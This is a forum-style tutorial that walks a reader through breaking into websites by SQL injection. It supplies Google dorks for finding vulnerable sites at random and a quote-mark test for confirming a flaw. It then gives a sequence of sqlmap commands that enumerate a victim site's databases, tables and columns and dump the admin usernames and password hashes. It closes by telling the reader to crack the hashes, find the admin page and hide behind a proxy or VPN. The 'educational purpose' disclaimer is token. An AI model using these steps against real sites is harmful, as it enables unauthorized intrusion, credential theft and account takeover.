HOW TO HACK A WEBSITE?

 

HOW TO HACK A WEBSITE? Difficulty Level - Intermediate Requirements - Kali or Backtrack 5 or ubuntu with sqlmap installed Sqlinjection In this tutorial I am going to show you how to hack a website with slqmap on Kali Linux. Introduction Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap. Now follow my steps to hack a website using sqlmap. Step 1 Find Sql vulnerable site. I will give you some dorks which may help you finding websites vulnerable to Sql Injection. Code: ]inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= Step 2 Test if the website is vulnerable ]To test if the website is vulnerable to Sqli just add " ' " at the end of the url. Like on the image below: [Image: image1_zps1ba326d9.jpg] And press enter. If error appears Ok, so we found the target. Now let's go ahed. Step 3 Injection Type this command in the terminal and hit enter Code: sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs (Insert the url that we checked for Sql Vulnerability) Now we will get the database name of the website. We got the two database we will select database name. Let's get the tables of that database. For that we need to enter this command on terminal and after that hit Enter. Code: sqlmap -u "http://www.yourvictim/page.php?id=1" -D Database_name --tables Now we will get the tables list which is stored in the database we selected. Now lets grab the columns from the admin table , type on terminal: Code: sqlmap -u "http://www.yourvictim/page.php?id=1" -D database_name -T admin --columns Now we got the columns and we got user and pass Now let's grab the user and pass Code: sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin -C user,pass --dump Now we have to decrypt the hash , there are also tutorial about hash decryption on CHF. The only thing which is left now is to find the admin page and remember to use Proxy/Vpn ! This is a short tutorial of Sql injection i am sure there much in this to be covered but you get the basic idea we will very soon release a video related to it on our youtube channel. this tutorial is for educational purpose Hacking website without mutual understanding may leads to crime enjoy